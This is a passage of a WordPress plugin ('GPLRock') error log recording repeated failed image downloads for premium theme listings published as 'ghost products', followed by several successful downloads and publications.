HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/growler---brewery-wordpress-theme-9164.webp for product growler-brewery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:02 UTC] GPLRock WARNING: Image download failed for product growler-brewery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/growler---brewery-wordpress-theme-9164.webp [05-Apr-2026 05:24:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: growler-brewery-wordpress-theme [05-Apr-2026 05:24:02 UTC] GPLRock: Image download failed for product franco-elegant-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:04 UTC] GPLRock: Image download failed for product franco-elegant-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/franco---elegant-woocommerce-wordpress-theme-9765.webp for product franco-elegant-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:06 UTC] GPLRock: Image download failed for product franco-elegant-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:08 UTC] GPLRock: Image download failed for product franco-elegant-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/franco---elegant-woocommerce-wordpress-theme-9765.webp for product franco-elegant-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:10 UTC] GPLRock WARNING: Image download failed for product franco-elegant-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/franco---elegant-woocommerce-wordpress-theme-9765.webp [05-Apr-2026 05:24:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: franco-elegant-woocommerce-wordpress-theme [05-Apr-2026 05:24:10 UTC] GPLRock: Image download failed for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:13 UTC] GPLRock: Image download failed for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-mimosa---modern-fashion-woocommerce-wordpress-theme-15493.webp for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:15 UTC] GPLRock: Image download failed for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:17 UTC] GPLRock: Image download failed for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-mimosa---modern-fashion-woocommerce-wordpress-theme-15493.webp for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:19 UTC] GPLRock WARNING: Image download failed for product vg-mimosa-modern-fashion-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vg-mimosa---modern-fashion-woocommerce-wordpress-theme-15493.webp [05-Apr-2026 05:24:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-mimosa-modern-fashion-woocommerce-wordpress-theme [05-Apr-2026 05:24:19 UTC] GPLRock: Image download failed for product media-consult-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:21 UTC] GPLRock: Image download failed for product media-consult-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-consult---business-wordpress-theme-30091.webp for product media-consult-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:23 UTC] GPLRock: Image download failed for product media-consult-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:26 UTC] GPLRock: Image download failed for product media-consult-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-consult---business-wordpress-theme-30091.webp for product media-consult-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:28 UTC] GPLRock WARNING: Image download failed for product media-consult-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/media-consult---business-wordpress-theme-30091.webp [05-Apr-2026 05:24:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: media-consult-business-wordpress-theme [05-Apr-2026 05:24:28 UTC] GPLRock: Image download failed for product medilazar-pharmacy-medical-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:30 UTC] GPLRock: Image download failed for product medilazar-pharmacy-medical-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medilazar---pharmacy-medical-woocommerce-wordpress-theme-5474.webp for product medilazar-pharmacy-medical-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:32 UTC] GPLRock: Image download failed for product medilazar-pharmacy-medical-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:34 UTC] GPLRock: Image download failed for product medilazar-pharmacy-medical-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medilazar---pharmacy-medical-woocommerce-wordpress-theme-5474.webp for product medilazar-pharmacy-medical-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:36 UTC] GPLRock WARNING: Image download failed for product medilazar-pharmacy-medical-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medilazar---pharmacy-medical-woocommerce-wordpress-theme-5474.webp [05-Apr-2026 05:24:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medilazar-pharmacy-medical-woocommerce-wordpress-theme [05-Apr-2026 05:24:36 UTC] GPLRock: Image download failed for product payna-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:39 UTC] GPLRock: Image download failed for product payna-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payna---minimal-woocommerce-theme-17810.webp for product payna-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:41 UTC] GPLRock: Image download failed for product payna-minimal-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:43 UTC] GPLRock: Image download failed for product payna-minimal-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payna---minimal-woocommerce-theme-17810.webp for product payna-minimal-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:45 UTC] GPLRock WARNING: Image download failed for product payna-minimal-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/payna---minimal-woocommerce-theme-17810.webp [05-Apr-2026 05:24:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: payna-minimal-woocommerce-theme [05-Apr-2026 05:24:45 UTC] GPLRock: Image download failed for product exmart-minimal-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:47 UTC] GPLRock: Image download failed for product exmart-minimal-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exmart---minimal-ecommerce-wordpress-theme-10373.webp for product exmart-minimal-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:49 UTC] GPLRock: Image download failed for product exmart-minimal-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:51 UTC] GPLRock: Image download failed for product exmart-minimal-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:24:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exmart---minimal-ecommerce-wordpress-theme-10373.webp for product exmart-minimal-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:24:54 UTC] GPLRock WARNING: Image download failed for product exmart-minimal-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/exmart---minimal-ecommerce-wordpress-theme-10373.webp [05-Apr-2026 05:24:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exmart-minimal-ecommerce-wordpress-theme [05-Apr-2026 05:25:08 UTC] GPLRock: Image download failed for product xlander-premium-landing-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:10 UTC] GPLRock: Image download failed for product xlander-premium-landing-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xlander---premium-landing-page-template-1154.webp for product xlander-premium-landing-page-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:12 UTC] GPLRock: Image download failed for product xlander-premium-landing-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:14 UTC] GPLRock: Image download failed for product xlander-premium-landing-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xlander---premium-landing-page-template-1154.webp for product xlander-premium-landing-page-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:16 UTC] GPLRock WARNING: Image download failed for product xlander-premium-landing-page-template. URL: https://meldwp.com/wp-content/uploads/xlander---premium-landing-page-template-1154.webp [05-Apr-2026 05:25:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xlander-premium-landing-page-template [05-Apr-2026 05:25:16 UTC] GPLRock: Image download failed for product leadinjection-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:18 UTC] GPLRock: Image download failed for product leadinjection-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leadinjection---landing-page-theme-14236.webp for product leadinjection-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:20 UTC] GPLRock: Image download failed for product leadinjection-landing-page-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:23 UTC] GPLRock: Image download failed for product leadinjection-landing-page-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leadinjection---landing-page-theme-14236.webp for product leadinjection-landing-page-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:25 UTC] GPLRock WARNING: Image download failed for product leadinjection-landing-page-theme. URL: https://meldwp.com/wp-content/uploads/leadinjection---landing-page-theme-14236.webp [05-Apr-2026 05:25:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leadinjection-landing-page-theme [05-Apr-2026 05:25:25 UTC] GPLRock: Image download failed for product sellegance-responsive-and-clean-opencart-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:27 UTC] GPLRock: Image download failed for product sellegance-responsive-and-clean-opencart-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sellegance---responsive-and-clean-opencart-theme-31611.webp for product sellegance-responsive-and-clean-opencart-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:29 UTC] GPLRock: Image download failed for product sellegance-responsive-and-clean-opencart-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:31 UTC] GPLRock: Image download failed for product sellegance-responsive-and-clean-opencart-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sellegance---responsive-and-clean-opencart-theme-31611.webp for product sellegance-responsive-and-clean-opencart-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:33 UTC] GPLRock WARNING: Image download failed for product sellegance-responsive-and-clean-opencart-theme. URL: https://meldwp.com/wp-content/uploads/sellegance---responsive-and-clean-opencart-theme-31611.webp [05-Apr-2026 05:25:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sellegance-responsive-and-clean-opencart-theme [05-Apr-2026 05:25:33 UTC] GPLRock: Image download failed for product casa-furniture-ceramics-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:36 UTC] GPLRock: Image download failed for product casa-furniture-ceramics-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/casa---furniture-ceramics-woocommerce-theme-25308.webp for product casa-furniture-ceramics-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:38 UTC] GPLRock: Image download failed for product casa-furniture-ceramics-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:40 UTC] GPLRock: Image download failed for product casa-furniture-ceramics-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/casa---furniture-ceramics-woocommerce-theme-25308.webp for product casa-furniture-ceramics-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:42 UTC] GPLRock WARNING: Image download failed for product casa-furniture-ceramics-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/casa---furniture-ceramics-woocommerce-theme-25308.webp [05-Apr-2026 05:25:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: casa-furniture-ceramics-woocommerce-theme [05-Apr-2026 05:25:42 UTC] GPLRock: Image download failed for product capitol-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:44 UTC] GPLRock: Image download failed for product capitol-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/capitol--creative-multi-purpose-wordpress-theme-4616.webp for product capitol-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:46 UTC] GPLRock: Image download failed for product capitol-creative-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:49 UTC] GPLRock: Image download failed for product capitol-creative-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/capitol--creative-multi-purpose-wordpress-theme-4616.webp for product capitol-creative-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:51 UTC] GPLRock WARNING: Image download failed for product capitol-creative-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/capitol--creative-multi-purpose-wordpress-theme-4616.webp [05-Apr-2026 05:25:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: capitol-creative-multi-purpose-wordpress-theme [05-Apr-2026 05:25:51 UTC] GPLRock: Image download failed for product timenews-publisher-magazine-newspaper-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:53 UTC] GPLRock: Image download failed for product timenews-publisher-magazine-newspaper-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timenews---publisher-magazine-newspaper-theme-3706.webp for product timenews-publisher-magazine-newspaper-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:55 UTC] GPLRock: Image download failed for product timenews-publisher-magazine-newspaper-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:57 UTC] GPLRock: Image download failed for product timenews-publisher-magazine-newspaper-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:25:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/timenews---publisher-magazine-newspaper-theme-3706.webp for product timenews-publisher-magazine-newspaper-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:25:59 UTC] GPLRock WARNING: Image download failed for product timenews-publisher-magazine-newspaper-theme. URL: https://meldwp.com/wp-content/uploads/timenews---publisher-magazine-newspaper-theme-3706.webp [05-Apr-2026 05:25:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: timenews-publisher-magazine-newspaper-theme [05-Apr-2026 05:25:59 UTC] GPLRock: Image download failed for product namm-grocery-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:02 UTC] GPLRock: Image download failed for product namm-grocery-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/namm---grocery-shop-wordpress-theme-24979.webp for product namm-grocery-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:04 UTC] GPLRock: Image download failed for product namm-grocery-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:06 UTC] GPLRock: Image download failed for product namm-grocery-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/namm---grocery-shop-wordpress-theme-24979.webp for product namm-grocery-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:08 UTC] GPLRock WARNING: Image download failed for product namm-grocery-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/namm---grocery-shop-wordpress-theme-24979.webp [05-Apr-2026 05:26:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: namm-grocery-shop-wordpress-theme [05-Apr-2026 05:26:08 UTC] GPLRock: Image download failed for product edufu-education-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:10 UTC] GPLRock: Image download failed for product edufu-education-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edufu---education--online-courses-wordpress-theme-16706.webp for product edufu-education-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:13 UTC] GPLRock: Image download failed for product edufu-education-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:15 UTC] GPLRock: Image download failed for product edufu-education-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edufu---education--online-courses-wordpress-theme-16706.webp for product edufu-education-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:17 UTC] GPLRock WARNING: Image download failed for product edufu-education-online-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edufu---education--online-courses-wordpress-theme-16706.webp [05-Apr-2026 05:26:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edufu-education-online-courses-wordpress-theme [05-Apr-2026 05:26:17 UTC] GPLRock: Image download failed for product neotek-electronics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:19 UTC] GPLRock: Image download failed for product neotek-electronics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neotek--electronics-wordpress-theme-7814.webp for product neotek-electronics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:21 UTC] GPLRock: Image download failed for product neotek-electronics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:23 UTC] GPLRock: Image download failed for product neotek-electronics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neotek--electronics-wordpress-theme-7814.webp for product neotek-electronics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:25 UTC] GPLRock WARNING: Image download failed for product neotek-electronics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/neotek--electronics-wordpress-theme-7814.webp [05-Apr-2026 05:26:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neotek-electronics-wordpress-theme [05-Apr-2026 05:26:25 UTC] GPLRock: Image download failed for product springbook-responsive-wordpress-blog-travel-photography-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:28 UTC] GPLRock: Image download failed for product springbook-responsive-wordpress-blog-travel-photography-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/springbook---responsive-wordpress-blog-travel-photography-theme-6042.webp for product springbook-responsive-wordpress-blog-travel-photography-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:30 UTC] GPLRock: Image download failed for product springbook-responsive-wordpress-blog-travel-photography-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:32 UTC] GPLRock: Image download failed for product springbook-responsive-wordpress-blog-travel-photography-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:26:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/springbook---responsive-wordpress-blog-travel-photography-theme-6042.webp for product springbook-responsive-wordpress-blog-travel-photography-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:26:34 UTC] GPLRock WARNING: Image download failed for product springbook-responsive-wordpress-blog-travel-photography-theme. URL: https://meldwp.com/wp-content/uploads/springbook---responsive-wordpress-blog-travel-photography-theme-6042.webp [05-Apr-2026 05:26:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: springbook-responsive-wordpress-blog-travel-photography-theme [05-Apr-2026 05:26:49 UTC] GPLRock: Image downloaded successfully for product klinskin-skincare-dermatology-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb23a053.webp [05-Apr-2026 05:26:50 UTC] GPLRock: Using pre-downloaded image for product klinskin-skincare-dermatology-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb23a053.webp [05-Apr-2026 05:26:50 UTC] GPLRock: Ghost product published with image - Product ID: klinskin-skincare-dermatology-clinic-elementor-template-kit [05-Apr-2026 05:26:51 UTC] GPLRock: Image downloaded successfully for product kitsoccer-football-team-sports-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b35bcd69.webp [05-Apr-2026 05:26:51 UTC] GPLRock: Using pre-downloaded image for product kitsoccer-football-team-sports-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b35bcd69.webp [05-Apr-2026 05:26:51 UTC] GPLRock: Ghost product published with image - Product ID: kitsoccer-football-team-sports-elementor-template-kit [05-Apr-2026 05:26:53 UTC] GPLRock: Image downloaded successfully for product kintamani-dog-breeder-adoption-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-38464ebf.jpg [05-Apr-2026 05:26:53 UTC] GPLRock: Using pre-downloaded image for product kintamani-dog-breeder-adoption-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-38464ebf.jpg [05-Apr-2026 05:26:53 UTC] GPLRock: Ghost product published with image - Product ID: kintamani-dog-breeder-adoption-elementor-template-kit [05-Apr-2026 05:26:54 UTC] GPLRock: Image downloaded successfully for product kidzonia-kindergarten-child-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b5f70ee.webp [05-Apr-2026 05:26:54 UTC] GPLRock: Using pre-downloaded image for product kidzonia-kindergarten-child-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b5f70ee.webp [05-Apr-2026 05:26:54 UTC] GPLRock: Ghost product published with image - Product ID: kidzonia-kindergarten-child-care-elementor-template-kit [05-Apr-2026 05:26:56 UTC] GPLRock: Image downloaded successfully for product great-lotus-buddhist-temple-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8313fe50.jpg [05-Apr-2026 05:26:56 UTC] GPLRock: Using pre-downloaded image for product great-lotus-buddhist-temple-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8313fe50.jpg [05-Apr-2026 05:26:56 UTC] GPLRock: Ghost product published with image - Product ID: great-lotus-buddhist-temple-template-kit [05-Apr-2026 05:26:57 UTC] GPLRock: Image downloaded successfully for product grain-grower-agriculture-farm-farmers-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41f5a446.webp [05-Apr-2026 05:26:57 UTC] GPLRock: Using pre-downloaded image for product grain-grower-agriculture-farm-farmers-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41f5a446.webp [05-Apr-2026 05:26:57 UTC] GPLRock: Ghost product published with image - Product ID: grain-grower-agriculture-farm-farmers-elementor-template-kit [05-Apr-2026 05:26:59 UTC] GPLRock: Image downloaded successfully for product gomo-moving-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff04d57e.webp [05-Apr-2026 05:26:59 UTC] GPLRock: Using pre-downloaded image for product gomo-moving-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff04d57e.webp [05-Apr-2026 05:26:59 UTC] GPLRock: Ghost product published with image - Product ID: gomo-moving-company-elementor-template-kit [05-Apr-2026 05:27:01 UTC] GPLRock: Image downloaded successfully for product glamping-luxury-camping-campground-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70112f46.jpg [05-Apr-2026 05:27:01 UTC] GPLRock: Using pre-downloaded image for product glamping-luxury-camping-campground-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-70112f46.jpg [05-Apr-2026 05:27:01 UTC] GPLRock: Ghost product published with image - Product ID: glamping-luxury-camping-campground-elementor-template-kit [05-Apr-2026 05:27:02 UTC] GPLRock: Image downloaded successfully for product givoxin-charity-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-524aa3dd.webp [05-Apr-2026 05:27:02 UTC] GPLRock: Using pre-downloaded image for product givoxin-charity-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-524aa3dd.webp [05-Apr-2026 05:27:02 UTC] GPLRock: Ghost product published with image - Product ID: givoxin-charity-elementor-template-kit [05-Apr-2026 05:27:04 UTC] GPLRock: Image downloaded successfully for product floatkit-personal-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad8dbb87.webp [05-Apr-2026 05:27:04 UTC] GPLRock: Using pre-downloaded image for product floatkit-personal-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad8dbb87.webp [05-Apr-2026 05:27:04 UTC] GPLRock: Ghost product published with image - Product ID: floatkit-personal-resume-elementor-template-kit [05-Apr-2026 05:28:11 UTC] GPLRock: Image downloaded successfully for product 